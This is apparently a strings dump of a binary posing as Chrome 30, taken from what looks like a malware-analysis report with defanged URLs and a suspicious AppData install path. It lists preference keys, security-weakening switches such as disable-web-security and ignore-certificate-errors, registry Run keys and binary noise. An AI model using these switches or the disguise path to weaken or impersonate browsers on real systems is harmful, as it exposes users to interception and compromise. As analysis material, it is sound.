safe_browsing.wrapped_key
options_window.last_tab_index
content_settings_window.last_tab_index
certificate_manager_window.last_tab_index
browser.last_known_google_url
browser.last_prompted_google_url
browser.last_redirect_origin
shutdown.type
shutdown.num_processes
shutdown.num_processes_slow
restart.last.session.on.shutdown
was.restarted
restart.switch_mode
extensions.disabled
plugins.disable_plugin_finder
extensions.browseractions.container.width
extensions.autoupdate.last_check
extensions.autoupdate.next_check
extensions.alerts.initialized
extensions.allowed_install_sites
extensions.allowed_types
extensions.blacklistupdate.version
extensions.install.allowlist
extensions.install.denylist
extensions.install.forcelist
extensions.storage.garbagecollect
ntp.collapsed_foreign_sessions
ntp.most_visited_blacklist
ntp.promo_resource_cache_update
ntp.tips_resource_server
ntp.date_resource_server
ntp.shown_bookmarks_folder
ntp.shown_page
ntp.promo_desktop_session_found
ntp.webstore_enabled
ntp.app_page_names
devtools.adb_key
devtools.disabled
devtools.dock_side
devtools.edited_files
devtools.file_system_paths
devtools.split_location
devtools.open_docked
signin.allowed
sync.last_synced_time
sync.has_setup_completed
sync.keep_everything_synced
sync.app_notifications
sync.app_settings
sync.apps
sync.autofill_profile
sync.autofill
sync.bookmarks
sync.dictionary
sync.extension_settings
sync.extensions
sync.favicon_images
sync.favicon_tracking
sync.history_delete_directives
sync.managed_user_settings
sync.managed_users
sync.passwords
sync.preferences
sync.priority_preferences
sync.search_engines
sync.sessions
sync.synced_notifications
sync.tabs
sync.themes
sync.typed_urls
sync.managed
sync.suppress_start
sync.acknowledged_types
sync.max_invalidation_versions
sync.session_sync_guid
invalidator.client_id
invalidator.invalidation_state
invalidator.max_invalidation_versions
sync.encryption_bootstrap_token
sync.keystore_encryption_bootstrap_token
sync.using_secondary_passphrase
google.services.last_username
google.services.username
google.services.username_pattern
sync_promo.startup_count
sync_promo.user_skipped
sync_promo.show_on_first_run_allowed
sync_promo.show_ntp_bubble
sync_promo.error_message
profile.gaia_info_update_time
profile.gaia_info_picture_url
browser.web_app.create_on_desktop
browser.web_app.create_in_apps_menu
browser.web_app.create_in_quick_launch_bar
geolocation.access_token
remote_access.host_firewall_traversal
remote_access.host_require_two_factor
remote_access.host_domain
remote_access.host_talkgadget_prefix
remote_access.host_require_curtain
printing.print_preview_sticky_settings
cloud_print.service_url
cloud_print.signin_url
cloud_print.dialog_size.width
cloud_print.dialog_size.height
cloud_print.signin_dialog_size.width
cloud_print.signin_dialog_size.height
background_contents.registered
browser.shown_autolaunch_infobar
auth.schemes
auth.disable_negotiate_cname_lookup
auth.enable_negotiate_port
auth.server_whitelist
auth.negotiate_delegate_whitelist
auth.gssapi_library_name
auth.spdyproxy.origin
auth.allow_cross_origin_prompt
async_dns.enabled
http_received_content_length
http_original_content_length
hardware.audio_capture_enabled
hardware.audio_capture_allowed_urls
hardware.video_capture_enabled
hardware.video_capture_allowed_urls
browser.clear_lso_data_enabled
browser.pepper_flash_settings_enabled
browser.disk_cache_dir
browser.disk_cache_size
browser.media_cache_size
cros.system.releaseChannel
policy.disable_cloud_policy_on_signin
message_center.showed_first_run_balloon
cloud_print.enabled
cloud_print.proxy_id
cloud_print.auth_token
cloud_print.xmpp_auth_token
cloud_print.email
cloud_print.print_system_settings
cloud_print.enable_job_poll
cloud_print.robot_refresh_token
cloud_print.robot_email
cloud_print.user_settings.connectNewPrinters
cloud_print.xmpp_ping_enabled
cloud_print.xmpp_ping_timeout_sec
cloud_print.user_settings
cloud_print.user_settings.printers
cloud_print.submit_enabled
net.max_connections_per_proxy
profile.managed_default_content_settings.cookies
profile.managed_default_content_settings.images
profile.managed_default_content_settings.javascript
profile.managed_default_content_settings.plugins
profile.managed_default_content_settings.popups
profile.managed_default_content_settings.geolocation
profile.managed_default_content_settings.notifications
profile.managed_default_content_settings.media_stream
profile.managed_cookies_allowed_for_urls
profile.managed_cookies_blocked_for_urls
profile.managed_cookies_sessiononly_for_urls
profile.managed_images_allowed_for_urls
profile.managed_images_blocked_for_urls
profile.managed_javascript_allowed_for_urls
profile.managed_javascript_blocked_for_urls
profile.managed_plugins_allowed_for_urls
profile.managed_plugins_blocked_for_urls
profile.managed_popups_allowed_for_urls
profile.managed_popups_blocked_for_urls
profile.managed_notifications_allowed_for_urls
profile.managed_notifications_blocked_for_urls
profile.managed_auto_select_certificate_for_urls
background_mode.enabled
hardware_acceleration_mode.enabled
custom_handlers.registered_protocol_handlers
custom_handlers.ignored_protocol_handlers
custom_handlers.enabled
policy.device_refresh_rate
policy.user_refresh_rate
recovery_component.version
component_updater.state
media_galleries.gallery_id
media_galleries.remembered_galleries
network_profile.warnings_left
network_profile.last_warning_time
policy.last_statistics_update
app_list.profile
app_list.show_on_relaunch
app_list.launch_count
app_list.last_launch_ping
app_list.app_launch_count
app_list.last_app_launch_ping
module_conflict.bubble_shown
settings.privacy.drm_salt
settings.privacy.drm_enabled
nacl-loader-cmd-prefix
allow-webui-compositing
disable-webgl
blacklist-webgl
disable-image-transport-surface
speech-service-key
disable-webaudio
enable-webrtc-aec-recordings
enable-webrtc-tcp-server-socket
enable-webrtc-hw-decoding
enable-web-animations-css
enable-web-animations-svg
enable-web-midi
disable-web-security
enable-experimental-websocket
enable-experimental-web-platform-features
disable-webkit-media-source
enable-privileged-webgl-extensions
enable-tcp-fastopen
enable-viewport
ignore-certificate-errors
remote-debugging-port
renderer-cmd-prefix
enable-vtune-support
testing-fixed-http-port
testing-fixed-https-port
utility-cmd-prefix
webcore-log-channels
zygote-cmd-prefix
enable-webgl-draft-extensions
Visual C   CRT: Not enough memory to complete call to strerror.
Broken pipe
Inappropriate I/O control operation
Operation not permitted
portuguese-brazilian
GetProcessWindowStation
operator
SHELL32.dll
ole32.dll
OLEAUT32.dll
user.js
full-memory-crash-report
CHROME_PROFILER_TIME
%s-%Iu
ERROR_REPORT
metro_driver.dll
user32.dll
GetInitialUrl
PlatformFile.UnknownErrors.Windows
0123456789
Dictionary keys must be quoted.
Unsupported encoding. JSON must be UTF-8.
.thunks
.syzygy
Histogram: %s recorded %d samples
(flags = 0x%x)
\uX
Line: %i, column: %i, %s
(%d = %3.1f%%)
C:\b\build\slave\win\build\src\build\Release\chrome.exe.pdb
ShellExecuteExA
SHLWAPI.dll
KERNEL32.dll
USER32.dll
USERENV.dll
WTSAPI32.dll
VERSION.dll
WINMM.dll
GetWindowsDirectoryW
CreateIoCompletionPort
WaitNamedPipeW
TransactNamedPipe
SetNamedPipeHandleState
GetProcessHandleCount
GetProcessHeap
GetCPInfo
RegOpenKeyExW
RegCloseKey
RegCreateKeyExW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
CloseWindowStation
CreateWindowStationW
SetProcessWindowStation
chrome.exe
SetActiveURL
SetCrashKeyValuePair
zcÁ
#$(   ....6/6////. )
2(  ..////6//6
( /.///6////
(//.//6///.`
  55;;/?
  55;;>;>/
)^%x>
@DQSSSSSQLLHHGG?332200--'
BDRSSSSQLLPHH??332000-7.
6%%%%#%###!!
122200.- *('%
35955220.- ('$
79::995420.-*(&
<<=;;23.
|(==7:89?
ÞDDDCA)
K%8xHQ
R.RKi)
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"><dependency><dependentAssembly><assemblyIdentity type="Win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></dependentAssembly></dependency><trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"><security><requestedPrivileges><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></requestedPrivileges></security></trustInfo><compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
<supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>
<supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>
<supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>
<supportedOS Id="{1f676c76-80e1-4239-95bb-83d0f6d0da78}"></supportedOS>
9;:)<0<<<
5!5'5 50575
> >$>(>,>0>4>
< <$<(<,<
0#3'3 3/33373;3?3
: :$:(:,:0:
= =$=(=,=0=
>$><>@>`>|>
\\.\pipe\GoogleCrashServices\
\\.\pipe\ChromeCrashServices
ntdll.dll
error %u
unspecified-crash-key
hurl-chunk-%i
prn-info-%d
registering_chrome
echrmstp.exe
app_host.exe
chrome.dll
chrome_child.dll
npchrome_frame.dll
chrome_frame_helper.exe
ChromeFrameHelperWindowClass
ChromeFrameReadyMode
chrome_launcher.exe
new_chrome.exe
old_chrome.exe
delegate_execute.exe
nacl64.exe
setup.exe
InstallerSuccessLaunchCmdLine
{7D2B3E1D-D096-4594-9D8F-A6667F12E0AC}
{A2DF06F9-A21A-44A8-8A99-8B9C84F29160}
Browse the web
Software\Microsoft\Windows\CurrentVersion\Uninstall\Chromium
{8A69D345-D564-463C-AFF1-A69D9E530F96}
{430FD4D0-B729-4F61-AA34-91526481799D}
GoogleUpdateSetup.exe
CFEndTempOptOutCmd
CFOptInCmd
CFOptOutCmd
CFTempOptOutCmd
UninstallCmdLine
WebAccessible
{4ea16ac7-fd5a-47c3-875b-dbf4a2008c20}
ChromeCanary
BGoogle Chrome Canary
-chrome
-chromeframe
{8A69D345-D564-463c-AFF1-A69D9E530F96}
{5C65F4B0-3651-4514-B207-D10CB699B14B}
hXXp://VVV.google.com/support/chrome/bin/request.py?hl=$1&contact_type=uninstall
BGoogle Chrome
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
%d.%d.%d
{8BA986DA-5100-405E-AA35-86F34A02ACBF}
BGoogle Chrome Frame
Google\Chrome Frame
Chrome in a Frame.
Uninstall Chrome Frame
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome Frame
{FDA71E6F-AC4C-4a00-8B70-9958A68906BF}
BGoogle Chrome App Launcher
ChromeAppList
Software\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome App Launcher
{4DC8B4CA-1BDA-483e-B5FA-D3C12E15B62D}
Google Chrome binaries
%s\%s.dmp
rpcrt4.dll
dbghelp.dll
x-x-x-xx-xxxxxx
HKEY_DYN_DATA
HKEY_CURRENT_CONFIG
HKEY_PERFORMANCE_NLSTEXT
HKEY_PERFORMANCE_TEXT
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
pipe\
Ckernel32.dll
ALPC Port
s0x%X
Cntdll.dll
wow_helper.exe"
GSOFTWARE\Policies\Google\Chrome
${windows}
Chrome_StatusTrayWindow
Reported Crashes.txt
testing_interface.dll
Certificate Revocation Lists
Custom Dictionary.txt
Login Data
Origin Bound Certs
Cached Theme.pak
Web Applications
pepflashplayer.dll
Software\Google\Chrome\Metro
CHROME_METRO_NAV_SEARCH_REQUEST
CHROME_METRO_GET_CURRENT_TAB_INFO
mscoree.dll
ADVAPI32.DLL
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
nKERNEL32.DLL
WUSER32.DLL
DelegateExecute
\.exe
URL Protocol
webcal
https
.webp
.xhtml
.shtml
.html
Chrome HTML Document
ChromeHTML
Software\Microsoft\Windows\CurrentVersion\App Paths
Software\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice
gChrome_MessagePumpWindow_%p
HChrome_MessageWindow
Software\Classes\CLSID\{054AAE20-4BEA-4347-8A35-64A533254A9D}\LocalServer32
Software\Microsoft\Windows\CurrentVersion\Run
\StringFileInfo\xx\%ls
debug.log
.\debug.log
debug_message.exe
%Documents and Settings%\%current user%\Local Settings\Application Data\ICNS\browser\chrome.exe
Google Chrome
30.0.1573.2
chrome_exe

chrome.exe_1308:

.text
`.rdata
@.data
.rsrc
@.reloc
SSShx
xSSSh
FTPjKS
FtPj;S
C.PjRV
0.0.0.0-devel
Chrome
ChromeFrame
CHROME_METRO_DLL
Could not find exported function
app\client_util.cc
RelaunchChromeBrowserWithNewCommandLineIfNeeded
Failed to load Chrome DLL from
No valid Chrome version found
ChromeMain
NTDLL.DLL
CHROME_BREAKPAD_PIPE_NAME
1.3.21.115
app\breakpad_win.cc
subresource_url
rsesek_key
hXXp://VVV.google.com/search?q=%s&sourceid=chrome&ie=UTF-8
browser\chrome_process_finder_win.cc
installer\util\google_update_settings.cc
Removed multi-install failure key; switching to channel:
Removed incremental installer failure key; switching to channel:
Failed to write to application's ClientState key
auto-launch-chrome
chrome
chrome-frame
chrome-sxs
do-not-launch-chrome
make-chrome-default
new-setup-exe
register-chrome-browser
register-chrome-browser-suffix
register-dev-chrome
register-url-protocol
rename-chrome-exe
remove-chrome-registration
update-setup-exe
toast-results-key
installer\util\channel_info.cc
Skipping over key "
Failed to open key "
Cannot initialize AppCommands from an invalid key.
installer\util\app_commands.cc
googlechrome
iexplore.exe
googlechromeframe
googlechromeapphost
installer\util\master_preferences.cc
Cannot initialize an AppCommand from an invalid key.
installer\util\app_command.cc
installer\util\language_selector.cc
auto_launch_chrome
chrome_frame
chrome_shortcut_icon_index
import_bookmarks
import_bookmarks_from_file
import_history
import_home_page
import_search_engine
do_not_launch_chrome
make_chrome_default
make_chrome_default_for_user
extensions.settings
kernel32.dll
NtOpenKey
NtCreateKey
NtOpenKeyEx
CreateNamedPipeW
AudioCaptureAllowedUrls
AutoSelectCertificateForUrls
CloudPrintProxyEnabled
CloudPrintSubmitEnabled
ContentPackManualBehaviorURLs
CookiesAllowedForUrls
CookiesBlockedForUrls
CookiesSessionOnlyForUrls
DefaultSearchProviderAlternateURLs
DefaultSearchProviderIconURL
DefaultSearchProviderInstantURL
DefaultSearchProviderKeyword
DefaultSearchProviderSearchTermsReplacementKey
DefaultSearchProviderSearchURL
DefaultSearchProviderSuggestURL
EnableAuthNegotiatePort
EnableOriginBoundCerts
HideWebStoreIcon
ImagesAllowedForUrls
ImagesBlockedForUrls
ImportBookmarks
ImportHistory
ImportHomepage
ImportSavedPasswords
ImportSearchEngine
JavaScriptAllowedForUrls
JavaScriptBlockedForUrls
MetricsReportingEnabled
NotificationsAllowedForUrls
NotificationsBlockedForUrls
PasswordManagerAllowShowPasswords
PasswordManagerEnabled
PluginsAllowedForUrls
PluginsBlockedForUrls
PopupsAllowedForUrls
PopupsBlockedForUrls
ProxyBypassList
ProxyPacUrl
RemoteAccessHostDomain
RemoteAccessHostFirewallTraversal
RemoteAccessHostRequireCurtain
RemoteAccessHostRequireTwoFactor
RemoteAccessHostTalkGadgetPrefix
RestoreOnStartupURLs
URLBlacklist
URLWhitelist
VideoCaptureAllowedUrls
ChromeFrameContentTypes
ChromeFrameRendererSettings
ChromeOsLockOnIdleSuspend
ChromeOsReleaseChannel
ChromeOsReleaseChannelDelegated
DeviceAllowRedeemChromeOsRegistrationOffers
DeviceLocalAccountAutoLoginBailoutEnabled
DeviceLocalAccountAutoLoginDelay
DeviceLocalAccountAutoLoginId
DeviceLoginScreenDefaultHighContrastEnabled
DeviceLoginScreenDefaultLargeCursorEnabled
DeviceLoginScreenDefaultScreenMagnifierType
DeviceLoginScreenDefaultSpokenFeedbackEnabled
DeviceLoginScreenPowerManagement
DeviceLoginScreenSaverId
DeviceLoginScreenSaverTimeout
DeviceMetricsReportingEnabled
DeviceStartUpUrls
EnterpriseWebStoreName
EnterpriseWebStoreURL
HideWebStorePromo
RenderInChromeFrameList
ReportDeviceActivityTimes
ReportDeviceBootMode
ReportDeviceLocation
ReportDeviceNetworkInterfaces
ReportDeviceVersionInfo
SuppressChromeFrameTurndownPrompt
TermsOfServiceURL
CHROME_HEADLESS
CHROME_LOG_FILE
CHROMEOS_SESSION_LOG_DIR
CHROME_CRASHED
CHROME_RESTART
allow-http-background-page
allow-http-screen-capture
apps-checkout-url
apps-gallery-download-url
apps-gallery-url
apps-gallery-update-url
chrome-version
device-management-url
disable-extensions-http-throttling
disable-password-autofill-public-suffix-domain-matching
disable-sync-passwords
disable-sync-typed-urls
disable-web-resources
enable-auth-negotiate-port
enable-password-autofill-public-suffix-domain-matching
enable-autologin
enable-metrics-reporting-for-testing
enable-npn-http
enable-password-generation
enable-quic-https
enable-save-password-bubble
enable-user-controlled-alternate-protocol-ports
enable-websocket-over-spdy
explicitly-allowed-ports
google-base-url
google-search-domain-check-url
ignore-urlfetcher-cert-requests
install-from-webstore
limited-install-from-webstore
pack-extension-key
promo-server-url
proxy-bypass-list
proxy-pac-url
safebrowsing-url-prefix
safebrowsing-download-feedback-url
spelling-service-feedback-url
sync-invalidate-xmpp-login
sync-notification-host-port
sync-url
sync-try-ssltcp-first-for-xmpp
enable-syncfs-directory-operation
translate-script-url
try-chrome-again
variations-server-url
visit-urls
winhttp-proxy-resolver
plugins-metadata-server-url
windows8-search
CHROME_VERSION
>CHROME_PRE_READ_EXPERIMENT
chrome.googleechotest.com
hXXp://pipelining.googleechotest.com/
profile.managed.manual_hosts
profile.managed.manual_urls
profile.managed.custodian_email
profile.managed.custodian_name
profile.icon_version
profile.exited_cleanly
profile.exit_type
session.restore_on_startup
session.restore_on_startup_migrated
session.urls_to_restore_on_startup
intl.app_locale
intl.charset_default
intl.accept_languages
intl.static_encodings
intl.global.charset_default
webkit.webprefs.global.default_font_size
webkit.webprefs.global.default_fixed_font_size
webkit.webprefs.global.minimum_font_size
webkit.webprefs.global.minimum_logical_font_size
webkit.webprefs.global.javascript_enabled
webkit.webprefs.global.javascript_can_open_windows_automatically
webkit.webprefs.global.loads_images_automatically
webkit.webprefs.global.plugins_enabled
webkit.webprefs.global.standard_font_family
webkit.webprefs.global.fixed_font_family
webkit.webprefs.global.serif_font_family
webkit.webprefs.global.sansserif_font_family
webkit.webprefs.global.cursive_font_family
webkit.webprefs.global.fantasy_font_family
webkit.webprefs.standard_font_family
webkit.webprefs.fixed_font_family
webkit.webprefs.serif_font_family
webkit.webprefs.sansserif_font_family
webkit.webprefs.cursive_font_family
webkit.webprefs.fantasy_font_family
webkit.webprefs.fonts.standard
webkit.webprefs.fonts.fixed
webkit.webprefs.fonts.serif
webkit.webprefs.fonts.sansserif
webkit.webprefs.fonts.cursive
webkit.webprefs.fonts.fantasy
webkit.webprefs.fonts.pictograph
webkit.webprefs.fonts.standard.Arab
webkit.webprefs.fonts.fixed.Arab
webkit.webprefs.fonts.serif.Arab
webkit.webprefs.fonts.sansserif.Arab
webkit.webprefs.fonts.standard.Cyrl
webkit.webprefs.fonts.fixed.Cyrl
webkit.webprefs.fonts.serif.Cyrl
webkit.webprefs.fonts.sansserif.Cyrl
webkit.webprefs.fonts.standard.Grek
webkit.webprefs.fonts.fixed.Grek
webkit.webprefs.fonts.serif.Grek
webkit.webprefs.fonts.sansserif.Grek
webkit.webprefs.fonts.standard.Jpan
webkit.webprefs.fonts.fixed.Jpan
webkit.webprefs.fonts.serif.Jpan
webkit.webprefs.fonts.sansserif.Jpan
webkit.webprefs.fonts.standard.Hang
webkit.webprefs.fonts.fixed.Hang
webkit.webprefs.fonts.serif.Hang
webkit.webprefs.fonts.sansserif.Hang
webkit.webprefs.fonts.cursive.Hang
webkit.webprefs.fonts.standard.Hans
webkit.webprefs.fonts.fixed.Hans
webkit.webprefs.fonts.serif.Hans
webkit.webprefs.fonts.sansserif.Hans
webkit.webprefs.fonts.standard.Hant
webkit.webprefs.fonts.fixed.Hant
webkit.webprefs.fonts.serif.Hant
webkit.webprefs.fonts.sansserif.Hant
webkit.webprefs.web_security_enabled
webkit.webprefs.dom_paste_enabled
webkit.webprefs.shrinks_standalone_images_to_fit
webkit.webprefs.inspector_settings
webkit.webprefs.uses_universal_detector
webkit.webprefs.text_areas_are_resizable
webkit.webprefs.java_enabled
webkit.webprefs.tabs_to_links
webkit.webprefs.allow_displaying_insecure_content
webkit.webprefs.allow_running_insecure_content
webkit.webprefs.fonts.standard.Zyyy
webkit.webprefs.fonts.fixed.Zyyy
webkit.webprefs.fonts.serif.Zyyy
webkit.webprefs.fonts.sansserif.Zyyy
webkit.webprefs.fonts.cursive.Zyyy
webkit.webprefs.fonts.fantasy.Zyyy
webkit.webprefs.fonts.pictograph.Zyyy
webkit.webprefs.default_font_size
webkit.webprefs.default_fixed_font_size
webkit.webprefs.minimum_font_size
webkit.webprefs.minimum_logical_font_size
webkit.webprefs.javascript_enabled
webkit.webprefs.javascript_can_open_windows_automatically
webkit.webprefs.loads_images_automatically
webkit.webprefs.plugins_enabled
bookmark_bar.show_on_all_tabs
bookmark_bar.show_apps_shortcut
bookmark_editor.expanded_nodes
password_generation.enabled
profile.password_manager_enabled
profile.password_manager_allow_show_passwords
autologin.enabled
reverse_autologin.enabled
reverse_autologin.rejected_email_list
safebrowsing.enabled
safebrowsing.reporting_enabled
safebrowsing.proceed_anyway_disabled
incognito.mode_availability
search.suggest_enabled
browser.confirm_to_quit
security.cookie_behavior
default_search_provider.synced_guid
default_search_provider.enabled
default_search_provider.search_url
default_search_provider.suggest_url
default_search_provider.instant_url
default_search_provider.icon_url
default_search_provider.encodings
default_search_provider.name
default_search_provider.keyword
default_search_provider.id
default_search_provider.prepopulate_id
default_search_provider.alternate_urls
default_search_provider.search_terms_replacement_key
download.prompt_for_download
alternate_error_pages.enabled
dns_prefetching.startup_list
dns_prefetching.host_referral_list
spdy.disabled
net.http_server_properties
spdy.servers
spdy.alternate_protocol
protocol.disabled_schemes
policy.url_blacklist
policy.url_whitelist
instant_ui.zero_suggest_url_prefix
local_state.multiple_profile_prefs_version
dns_prefetching.enabled
hide_web_store_icon
browser.show_home_button
profile.recently_selected_encodings
browser.clear_data.browsing_history
browser.clear_data.download_history
browser.clear_data.cache
browser.clear_data.cookies
browser.clear_data.passwords
browser.clear_data.form_data
browser.clear_data.hosted_apps_data
browser.clear_data.content_licenses
browser.clear_data.time_period
browser.last_clear_browsing_data_time
browser.enable_spellchecking
browser.enabled_labs_experiments
browser.enable_autospellcorrect
browser.speechinput_censor_results
browser.speechinput_tray_notification_shown_contexts
history.saving_disabled
history.deleting_enabled
settings.force_safesearch
extensions.theme.pack
extensions.theme.id
extensions.theme.images
extensions.theme.colors
extensions.theme.tints
extensions.theme.properties
extensions.ui.developer_mode
extensions.toolbarsize
extensions.toolbar
extensions.commands
plugins.last_internal_directory
plugins.plugins_list
plugins.plugins_disabled
plugins.plugins_disabled_exceptions
plugins.plugins_enabled
plugins.migrated_to_pepper_flash
plugins.removed_old_component_pepper_flash_settings
plugins.show_details
plugins.allow_outdated
plugins.always_authorize
plugins.metadata
plugins.resource_cache_update
browser.check_default_browser
browser.suppress_switch_to_metro_mode_on_set_default
browser.default_browser_setting_enabled
browser.custom_chrome_frame
browser.desktop_notification_position
profile.default_content_settings
profile.content_settings.clear_on_exit_migrated
profile.content_settings.pref_version
profile.content_settings.pattern_pairs
profile.content_settings.whitelist_version
profile.content_settings.plugin_whitelist
profile.block_third_party_cookies
profile.clear_site_data_on_exit
profile.default_zoom_level
profile.per_host_zoom_levels
autofill.data_model_default
autofill.has_paid_with_wallet
autofill.pay_without_wallet
autofill.show_count
autofill.generated_card_bubble_times_shown
bookmarks.editing_enabled
translate.enabled
googlegeolocationaccess.enabled
media.default_audio_capture_device
media.default_video_capture_Device
import_saved_passwords
profile.avatar_index
profile.name
profile.is_managed
printing.enabled
printing.print_preview_disabled
profile.managed.default_filtering_behavior
profile.managed_user_creation_allowed
profile.managed_users
message_center.disabled_extension_ids
message_center.disabled_system_component_ids
message_center.enabled_sync_notifier_ids
profile.last_used
profile.last_active_profiles
profile.profiles_created
profile.created_by_version
profile.info_cache
ssl.rev_checking.enabled
ssl.version_min
ssl.version_max
ssl.cipher_suites.blacklist
ssl.origin_bound_certs.enabled
ssl.ssl_record_splitting.disabled
ssl.unrestricted_ssl3_fallback.enabled
user_experience_metrics.client_id
user_experience_metrics.session_id
user_experience_metrics.low_entropy_source
user_experience_metrics.permuted_entropy_cache
user_experience_metrics.client_id_timestamp
user_experience_metrics.reporting_enabled
user_experience_metrics.initial_logs_as_protobufs
user_experience_metrics.ongoing_logs_as_protobufs
user_experience_metrics.stability.exited_cleanly
user_experience_metrics.stability.stats_version
user_experience_metrics.stability.stats_buildtime
user_experience_metrics.stability.session_end_completed
user_experience_metrics.stability.launch_count
user_experience_metrics.stability.crash_count
user_experience_metrics.stability.incomplete_session_end_count
user_experience_metrics.stability.page_load_count
user_experience_metrics.stability.renderer_crash_count
user_experience_metrics.stability.launch_time_sec
user_experience_metrics.stability.extension_renderer_crash_count
user_experience_metrics.stability.last_timestamp_sec
user_experience_metrics.stability.plugin_stats2
user_experience_metrics.stability.renderer_hang_count
user_experience_metrics.stability.child_process_crash_count
user_experience_metrics.stability.other_user_crash_count
user_experience_metrics.stability.kernel_crash_count
user_experience_metrics.stability.system_unclean_shutdowns
user_experience_metrics.stability.breakpad_registration_ok
user_experience_metrics.stability.breakpad_registration_fail
user_experience_metrics.stability.debugger_present
user_experience_metrics.stability.debugger_not_present
uninstall_metrics.installation_date2
uninstall_metrics.page_load_count
uninstall_metrics.launch_count
uninstall_metrics.uptime_sec
uninstall_metrics.last_launch_time_sec
uninstall_metrics.last_observed_running_time_sec
browser.suppress_default_browser_prompt_for_version
browser.window_placement
task_manager.window_placement
keyword_editor.window_placement
preferences.window_placement
renderer.memory_cache.size
download.default_directory
download.directory_upgrade
savefile.default_directory
savefile.type
selectfile.last_directory
select_file_dialogs.allowed
filebrowser.tasks.default_by_mime_type
filebrowser.tasks.default_by_suffix
download.extensions_to_open
browser.hung_plugin_detect_freq
browser.plugin_message_response_timeout
spellcheck.dictionary
spellcheck.confirm_dialog_shown
spellcheck.use_spelling_service
protocol_handler.excluded_schemes
safe_browsing.client_key
safe_browsing.wrapped_key
options_window.last_tab_index
content_settings_window.last_tab_index
certificate_manager_window.last_tab_index
browser.last_known_google_url
browser.last_prompted_google_url
browser.last_redirect_origin
shutdown.type
shutdown.num_processes
shutdown.num_processes_slow
restart.last.session.on.shutdown
was.restarted
restart.switch_mode
extensions.disabled
plugins.disable_plugin_finder
extensions.browseractions.container.width
extensions.autoupdate.last_check
extensions.autoupdate.next_check
extensions.alerts.initialized
extensions.allowed_install_sites
extensions.allowed_types
extensions.blacklistupdate.version
extensions.install.allowlist
extensions.install.denylist
extensions.install.forcelist
extensions.storage.garbagecollect
ntp.collapsed_foreign_sessions
ntp.most_visited_blacklist
ntp.promo_resource_cache_update
ntp.tips_resource_server
ntp.date_resource_server
ntp.shown_bookmarks_folder
ntp.shown_page
ntp.promo_desktop_session_found
ntp.webstore_enabled
ntp.app_page_names
devtools.adb_key
devtools.disabled
devtools.dock_side
devtools.edited_files
devtools.file_system_paths
devtools.split_location
devtools.open_docked
signin.allowed
sync.last_synced_time
sync.has_setup_completed
sync.keep_everything_synced
sync.app_notifications
sync.app_settings
sync.apps
sync.autofill_profile
sync.autofill
sync.bookmarks
sync.dictionary
sync.extension_settings
sync.extensions
sync.favicon_images
sync.favicon_tracking
sync.history_delete_directives
sync.managed_user_settings
sync.managed_users
sync.passwords
sync.preferences
sync.priority_preferences
sync.search_engines
sync.sessions
sync.synced_notifications
sync.tabs
sync.themes
sync.typed_urls
sync.managed
sync.suppress_start
sync.acknowledged_types
sync.max_invalidation_versions
sync.session_sync_guid
invalidator.client_id
invalidator.invalidation_state
invalidator.max_invalidation_versions
sync.encryption_bootstrap_token
sync.keystore_encryption_bootstrap_token
sync.using_secondary_passphrase
google.services.last_username
google.services.username
google.services.username_pattern
sync_promo.startup_count
sync_promo.user_skipped
sync_promo.show_on_first_run_allowed
sync_promo.show_ntp_bubble
sync_promo.error_message
profile.gaia_info_update_time
profile.gaia_info_picture_url
browser.web_app.create_on_desktop
browser.web_app.create_in_apps_menu
browser.web_app.create_in_quick_launch_bar
geolocation.access_token
remote_access.host_firewall_traversal
remote_access.host_require_two_factor
remote_access.host_domain
remote_access.host_talkgadget_prefix
remote_access.host_require_curtain
printing.print_preview_sticky_settings
cloud_print.service_url
cloud_print.signin_url
cloud_print.dialog_size.width
cloud_print.dialog_size.height
cloud_print.signin_dialog_size.width
cloud_print.signin_dialog_size.height
background_contents.registered
browser.shown_autolaunch_infobar
auth.schemes
auth.disable_negotiate_cname_lookup
auth.enable_negotiate_port
auth.server_whitelist
auth.negotiate_delegate_whitelist
auth.gssapi_library_name
auth.spdyproxy.origin
auth.allow_cross_origin_prompt
async_dns.enabled
http_received_content_length
http_original_content_length
hardware.audio_capture_enabled
hardware.audio_capture_allowed_urls
hardware.video_capture_enabled
hardware.video_capture_allowed_urls
browser.clear_lso_data_enabled
browser.pepper_flash_settings_enabled
browser.disk_cache_dir
browser.disk_cache_size
browser.media_cache_size
cros.system.releaseChannel
policy.disable_cloud_policy_on_signin
message_center.showed_first_run_balloon
cloud_print.enabled
cloud_print.proxy_id
cloud_print.auth_token
cloud_print.xmpp_auth_token
cloud_print.email
cloud_print.print_system_settings
cloud_print.enable_job_poll
cloud_print.robot_refresh_token
cloud_print.robot_email
cloud_print.user_settings.connectNewPrinters
cloud_print.xmpp_ping_enabled
cloud_print.xmpp_ping_timeout_sec
cloud_print.user_settings
cloud_print.user_settings.printers
cloud_print.submit_enabled
net.max_connections_per_proxy
profile.managed_default_content_settings.cookies
profile.managed_default_content_settings.images
profile.managed_default_content_settings.javascript
profile.managed_default_content_settings.plugins
profile.managed_default_content_settings.popups
profile.managed_default_content_settings.geolocation
profile.managed_default_content_settings.notifications
profile.managed_default_content_settings.media_stream
profile.managed_cookies_allowed_for_urls
profile.managed_cookies_blocked_for_urls
profile.managed_cookies_sessiononly_for_urls
profile.managed_images_allowed_for_urls
profile.managed_images_blocked_for_urls
profile.managed_javascript_allowed_for_urls
profile.managed_javascript_blocked_for_urls
profile.managed_plugins_allowed_for_urls
profile.managed_plugins_blocked_for_urls
profile.managed_popups_allowed_for_urls
